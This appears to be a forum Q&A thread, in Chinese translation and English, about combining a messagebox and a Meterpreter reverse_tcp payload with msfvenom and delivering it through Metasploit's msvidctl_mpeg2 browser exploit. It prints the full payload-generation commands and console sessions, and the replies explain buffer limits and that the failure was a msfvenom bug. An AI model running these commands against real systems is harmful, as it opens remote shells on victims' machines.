具有多重负载的 Metasploit 通用/自定义负载
我一直在使用 msfvenom 和自定义/通用有效负载玩弄较新的 MSF4(框架:4.1.0-release.13988,控制台:4.1.0-release.13581)多有效负载支持,但似乎有很多有关有效负载在编码和兼容性方面支持的信息。
基本上我正在研究如何关闭服务器端服务,然后让 meterpreter 监听它不再绑定的端口。 (该漏洞将在另一个端口上出现)
本质上,我使用 msfvenom 与 msgbox 和 Meterpreter 背靠背创建了一个多重有效负载,作为 exe、raw 和 .rb。我尝试单独保留编码设置,并将其设置为“无”。 (请注意,自定义/通用有效负载 .rb 源说了仅允许 None 编码)
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw
我还尝试将 EXITFUNC 设置为“none”:
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw
然后我需要将原始多重有效负载写入通用/自定义有效负载可以使用的内容: (注意我已经尝试写入原始、exe、.rb 格式)
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw
最后是时候尝试使用通用/自定义的多重有效负载了:(注意我每次在尝试设置和利用之前都会重新加载利用)
msf > use exploit/windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom
msf exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
所以我找到了一个解释“没有编码器编码...”错误的含义。 (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) 我想这就是 stager 有效负载的用武之地。
错误的原因是 windows/msgbox 有效负载因为它没有上演吗?或者说多重有效负载没有上演?如果是后者,那么我看不出多重有效负载将如何工作,除非它们被上演。组合 2 个有效负载可能比单个有效负载更大。
有人可以至少解释一下应该与通用/有效负载有效负载兼容的编码和格式,以便我可以排除这种情况吗?我只找到了一些关于多有效负载支持的参考。
提前致谢!我保证一旦我这样做了,就会回复我是如何做到这一点的。
I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console : 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a derth of informoration on what the payload supports in terms of encodings and compatibility.
Basically I'm looking at how a server side service can be shutdown, then have the meterpreter listen on it's no longer bound port. (the exploit would come in on another port)
Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone, and setting it to None. (note that the custom/generic payload .rb source say something about only allowing None encoding)
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw
I also tried it with EXITFUNC set to "none":
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw
Then I need to write the raw multipayload to something that the generic/custom payload can use: (note I've tried writing to raw, exe, .rb formats)
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw
Finally it's time to try the multipayload out with generic/custom: (note that I reloaded the exploit each time before trying to set and exploit)
msf > use exploit/windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom
msf exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf exploit(msvidctl_mpeg2) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
So I found an explanation on what the "No encoders encoded..." error is supposed to mean. (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) This is where stager payloads come in I suppose.
Is the cause of the error the windows/msgbox payload because its not staged? Or is it that multipayloads aren't staged? If it's the later, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.
Can someone please at least explain the encodings and formats that should be compatible with the generic/payload payload so I can rule that out? I've only found a couple of references to multipayload support.
Thanks in advance! I promise to reply with how I got this working once I do.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(2)
我认为,在深入研究此类问题之前,了解一些漏洞利用动态和经典的内存损坏错误利用策略会对您有所帮助。
我可以建议软件安全评估的艺术< /a> 或 Shellcoder 手册
也就是说,发生的事情是这样的,当您在缓冲区溢出中“释放”内存时,在命中存储的堆栈帧和内存之前,可用于利用的空间有限。指令指针,MPEG2 浏览器错误(您试图利用它)在堆栈上分配 1024 个字节,因此这是您的有效负载的限制,并且它由标准系列终止(\x00\x09\x0a \x0d,分别是 null char、stop、回车符和换行符),这进一步限制了您只能使用任何未考虑到这一点而编写的 shellcode。
然而 Metasploit 非常聪明,它通常可以模拟一些具有“安全”和可利用指令的指令,但是由于指令集不一致、堆栈爆炸等,这并不总是可能的。当 msfvenom 的有效负载针对生成器运行时,没有什么可以'work' 并且 Metasploit 会抛出你的错误。
正如您所猜测的,这意味着您需要暂存您的 shellcode(呃,我的意思是有效负载),一个好的暂存有效负载通常可以被破坏并分布在多个内存位置,并且仍然具有足够的弹性(或重复性)以自动将其自身重新组合在一起使用一种称为“猎蛋”的技术,如果我处于你的位置,我会使用通用反向绑定 windows/meterpreter/reverse_tcp 然而,因为我不相信这种特定的利用混合了序数或任何时髦的东西像那样。
祝你好运
I think it would be helpful for you to understand some exploit dynamics and classical memory corruption bug exploit strategies before diving into something like this.
May I suggest The Art of Software Security Assessment or Shellcoder's Handbook
That said, here is what is happeneing, When you 'cave' out memory in a buffer overflow, you have a limited amount of space available for your exploit before you hit the stored stack frame & instruction pointer, The MPEG2 browser bug (which you are trying to exploit) allocates 1024 bytes on the stack which is thusly the limit of your payload, as well, it is terminated by the standard series (\x00\x09\x0a\x0d, Thats null char, stop, Carriage Return, and Line Feed respectively), which further limits you to any shellcode which is not written with this in mind.
Metasploit however is pretty smart, it can usually mock out some instructions with 'safe' and exploitable instructions, however this is not always possible due to inconsistencies in instruction sets, stack explosions, etc. When msfvenom's payload is ran against the generators, nothing can 'work' and Metasploit throws your error.
As you have guessed, this means you need to stage your shellcode (err, I meant payload), A good staging payload typically can be mangled and spread across multiple memory locations and is still resilient (or repetitive) enough to automatically put itself back together using a technique called egg hunting, If I was in your shoes I would use the generic reverse bind windows/meterpreter/reverse_tcp however, because I don't believe that this specific exploit mixes ordinals or anything funky like that.
Best of Luck
抱歉回复晚了。
MSF 4.1 中存在一个关于 msfvenom 的错误,而不是关于通用/自定义有效负载的错误。我生成的有效负载肯定小于允许的 1024 字节。这是一个专门讨论这个问题的帖子,HDM 本人认为这是一个错误:
https://community.rapid7.com/ thread/1332
以及与 msfvenom 的修复一起记录的错误案例:
http://dev.metasploit.com/redmine/issues/4714
我只是认为没有人使用多负载支持。不要对我之前对 msfvenom 的笨拙使用感到困惑。当我发布这个问题时,我已经绝望了,所以我包含了我认为问题可能出现的所有内容,而无需编写 shellcode。当 HDM 承认这是一个错误时,我正试图学习如何编写二合一 shellcode 测试,我决定走另一条路。 (我获取了 MSF Pro Trial 并设置了 VPN 枢轴来解决我的多跳测试场景)
感谢您的回复。
Sorry about the late answer.
There was a bug in MSF 4.1 regarding the msfvenom, not the generic/custom payload. The payloads I was generated were definitely smaller than the 1024 bytes allowable. Here's a thread dedicated to it, where HDM himself suggests it's a bug:
https://community.rapid7.com/thread/1332
And the bug case that was logged along with the fix for msfvenom:
http://dev.metasploit.com/redmine/issues/4714
I just don't think anyone was using the multi-payload support. Don't be confused by my previous clunky use of msfvenom. I was desperate by the time I posted this question so I included everything I thought the problem might be without getting into writing shellcode. I was on the verge of trying to learn how to write a 2-in-1 shellcode test when HDM admitted this was a bug and I decided to go another route. (I grabbed the MSF Pro Trial and setup a VPN pivot to solve my multi-hop test scenario)
Thanks for the response.